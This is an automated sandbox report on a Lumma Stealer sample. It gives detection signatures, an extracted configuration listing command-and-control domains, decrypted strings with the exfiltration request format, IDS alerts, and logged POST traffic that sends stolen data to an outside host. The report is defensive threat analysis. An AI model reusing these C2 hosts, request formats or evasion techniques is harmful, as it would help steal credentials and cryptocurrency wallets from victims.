Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:random.exe
Analysis ID:1590579
MD5:4283b9ebedc388abeaafa9cea78c1b70
SHA1:30efae5a5508741d0f537ff9b8bbc04b7be1c30f
SHA256:d5a861959e92c8a53a516c7438448396e7e433866488b01eba69354897ed5417
Tags:exelummamalwareuser-Joker
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • random.exe (PID: 5560 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 4283B9EBEDC388ABEAAFA9CEA78C1B70)
    • conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • random.exe (PID: 528 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 4283B9EBEDC388ABEAAFA9CEA78C1B70)
    • WerFault.exe (PID: 652 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 916 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["truculengisau.biz", "grandiouseziu.biz", "punishzement.biz", "spookycappy.biz", "marketlumpe.biz", "nuttyshopr.biz", "owerinternal.sbs", "fraggielek.biz", "littlenotii.biz"], "Build id": "FATE99--test"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T09:53:03.859561+010020283713Unknown Traffic192.168.2.549704104.102.49.254443TCP
        2025-01-14T09:53:05.281057+010020283713Unknown Traffic192.168.2.549705188.114.97.3443TCP
        2025-01-14T09:53:06.160960+010020283713Unknown Traffic192.168.2.549707188.114.97.3443TCP
        2025-01-14T09:53:07.279472+010020283713Unknown Traffic192.168.2.549710188.114.97.3443TCP
        2025-01-14T09:53:11.738872+010020283713Unknown Traffic192.168.2.549715188.114.97.3443TCP
        2025-01-14T09:53:12.936560+010020283713Unknown Traffic192.168.2.549717188.114.97.3443TCP
        2025-01-14T09:53:14.170083+010020283713Unknown Traffic192.168.2.549719188.114.97.3443TCP
        2025-01-14T09:53:15.387604+010020283713Unknown Traffic192.168.2.549722188.114.97.3443TCP
        2025-01-14T09:53:18.968626+010020283713Unknown Traffic192.168.2.549742188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T09:53:05.682426+010020546531A Network Trojan was detected192.168.2.549705188.114.97.3443TCP
        2025-01-14T09:53:06.622871+010020546531A Network Trojan was detected192.168.2.549707188.114.97.3443TCP
        2025-01-14T09:53:19.437834+010020546531A Network Trojan was detected192.168.2.549742188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T09:53:05.682426+010020498361A Network Trojan was detected192.168.2.549705188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T09:53:06.622871+010020498121A Network Trojan was detected192.168.2.549707188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T09:53:03.087067+010020591331Domain Observed Used for C2 Detected192.168.2.5508531.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T09:53:03.099666+010020591351Domain Observed Used for C2 Detected192.168.2.5640081.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T09:53:03.111488+010020591371Domain Observed Used for C2 Detected192.168.2.5604491.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T09:53:03.124676+010020591411Domain Observed Used for C2 Detected192.168.2.5548631.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T09:53:03.140967+010020591431Domain Observed Used for C2 Detected192.168.2.5491631.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T09:53:03.072390+010020591631Domain Observed Used for C2 Detected192.168.2.5560731.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T09:53:03.153320+010020591451Domain Observed Used for C2 Detected192.168.2.5618401.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T09:53:03.168634+010020591511Domain Observed Used for C2 Detected192.168.2.5578551.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T09:53:03.179520+010020591531Domain Observed Used for C2 Detected192.168.2.5620501.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T09:53:14.625111+010020480941Malware Command and Control Activity Detected192.168.2.549719188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T09:53:15.391858+010028438641A Network Trojan was detected192.168.2.549722188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T09:53:04.369005+010028586661Domain Observed Used for C2 Detected192.168.2.549704104.102.49.254443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: owerinternal.sbsAvira URL Cloud: Label: malware
        Source: https://aleksandr-block.com/apiAvira URL Cloud: Label: malware
        Source: 3.2.random.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["truculengisau.biz", "grandiouseziu.biz", "punishzement.biz", "spookycappy.biz", "marketlumpe.biz", "nuttyshopr.biz", "owerinternal.sbs", "fraggielek.biz", "littlenotii.biz"], "Build id": "FATE99--test"}
        Source: random.exeVirustotal: Detection: 68%Perma Link
        Source: random.exeReversingLabs: Detection: 71%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.4% probability
        Source: random.exeJoe Sandbox ML: detected
        Source: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: truculengisau.biz
        Source: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: spookycappy.biz
        Source: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: punishzement.biz
        Source: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: nuttyshopr.biz
        Source: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: marketlumpe.biz
        Source: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: littlenotii.biz
        Source: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: grandiouseziu.biz
        Source: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fraggielek.biz
        Source: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: owerinternal.sbs
        Source: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
        Source: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
        Source: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
        Source: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
        Source: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: FATE99--test
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004182C0 CryptUnprotectData,3_2_004182C0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00415D15 CryptUnprotectData,3_2_00415D15
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00418404 CryptUnprotectData,3_2_00418404
        Source: random.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49719 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49742 version: TLS 1.2
        Source: random.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: System.Windows.Forms.pdb source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: mscorlib.pdb` source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: mscorlib.pdb source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: System.ni.pdbRSDS source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: System.Windows.Forms.pdbMZ@ source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: Akim1er.pdb source: random.exe, WERF6A.tmp.dmp.6.dr
        Source: Binary string: mscorlib.ni.pdb source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: System.pdbL0 source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: mscorlib.ni.pdbRSDS source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: System.ni.pdb source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: System.pdb source: WERF6A.tmp.dmp.6.dr
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042D420
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov esi, edx3_2_00408740
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+32DBB3B0h]3_2_00427A50
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx+05CAF138h]3_2_0040BA29
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then push 00000000h3_2_0040CB44
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00423E44
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [ebx], cl3_2_0042E002
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [ebx], cl3_2_0042E002
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov dword ptr [esi+04h], eax3_2_004161DF
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]3_2_004251E8
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then lea eax, dword ptr [eax+eax*4]3_2_004082A0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then push eax3_2_00440310
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov eax, dword ptr [00448B08h]3_2_004273A0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+1Ch]3_2_004273A0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then lea eax, dword ptr [esp+50h]3_2_004273A0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]3_2_00417451
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_00407400
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_00407400
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7E3E42A0h3_2_0043C410
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then push esi3_2_0043C410
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042B430
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax]3_2_0042E5C2
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov dword ptr [esi+04h], eax3_2_004165EE
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]3_2_00415590
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov edx, ecx3_2_004095A0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]3_2_0041F710
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-000000DEh]3_2_0041F710
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh3_2_004427E0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042E7EB
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042F799
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h3_2_00429871
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov ecx, eax3_2_0042A810
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then jmp eax3_2_004288BA
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx esi, byte ptr [edx]3_2_00402940
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+0Eh]3_2_0040A910
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then push dword ptr [esp+28h]3_2_00426A00
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00438AF0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov word ptr [ebx], cx3_2_0041AA90
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov word ptr [esi], cx3_2_0041AA90
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+2564CAB9h]3_2_0043EB00
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov ecx, eax3_2_00420B10
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]3_2_0041DC40
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00415C25
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then add ebp, edi3_2_00408CD0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov word ptr [edi], cx3_2_00426D70
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [edx], cl3_2_0042DD30
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov dword ptr [esi+04h], eax3_2_00415E42
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_00413E50
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_0040DE72
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+79h]3_2_00425E00
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]3_2_00425E00
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h3_2_0043EE10
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00408EB0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_0041DEB0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 13884179h3_2_0040DFEA
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042DFAF

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2059145 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (punishzement .biz) : 192.168.2.5:61840 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2059153 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (truculengisau .biz) : 192.168.2.5:62050 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2059151 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spookycappy .biz) : 192.168.2.5:57855 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2059133 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fraggielek .biz) : 192.168.2.5:50853 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2059135 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grandiouseziu .biz) : 192.168.2.5:64008 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2059141 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marketlumpe .biz) : 192.168.2.5:54863 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2059137 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (littlenotii .biz) : 192.168.2.5:60449 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2059143 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nuttyshopr .biz) : 192.168.2.5:49163 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2059163 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (owerinternal .sbs) : 192.168.2.5:56073 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 104.102.49.254:443
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49719 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49707 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49742 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49722 -> 188.114.97.3:443
        Source: Malware configuration extractorURLs: truculengisau.biz
        Source: Malware configuration extractorURLs: grandiouseziu.biz
        Source: Malware configuration extractorURLs: punishzement.biz
        Source: Malware configuration extractorURLs: spookycappy.biz
        Source: Malware configuration extractorURLs: marketlumpe.biz
        Source: Malware configuration extractorURLs: nuttyshopr.biz
        Source: Malware configuration extractorURLs: owerinternal.sbs
        Source: Malware configuration extractorURLs: fraggielek.biz
        Source: Malware configuration extractorURLs: littlenotii.biz
        Source: global trafficTCP traffic: 192.168.2.5:53448 -> 162.159.36.2:53
        Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
        Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
        Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.102.49.254:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49742 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49719 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 188.114.97.3:443
        Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aleksandr-block.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: aleksandr-block.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IST7RK1QCU7APUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12804Host: aleksandr-block.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V1046GCCGL3JS7ZSIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15070Host: aleksandr-block.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WNTHL69SO9YKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20530Host: aleksandr-block.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DAAUDKHTANMXRT3WIWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1422Host: aleksandr-block.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=W5X8IKKEPGIFLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550556Host: aleksandr-block.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: aleksandr-block.com
        Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
        Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
        Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
        Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
        Source: global trafficDNS traffic detected: DNS query: owerinternal.sbs
        Source: global trafficDNS traffic detected: DNS query: fraggielek.biz
        Source: global trafficDNS traffic detected: DNS query: grandiouseziu.biz
        Source: global trafficDNS traffic detected: DNS query: littlenotii.biz
        Source: global trafficDNS traffic detected: DNS query: marketlumpe.biz
        Source: global trafficDNS traffic detected: DNS query: nuttyshopr.biz
        Source: global trafficDNS traffic detected: DNS query: punishzement.biz
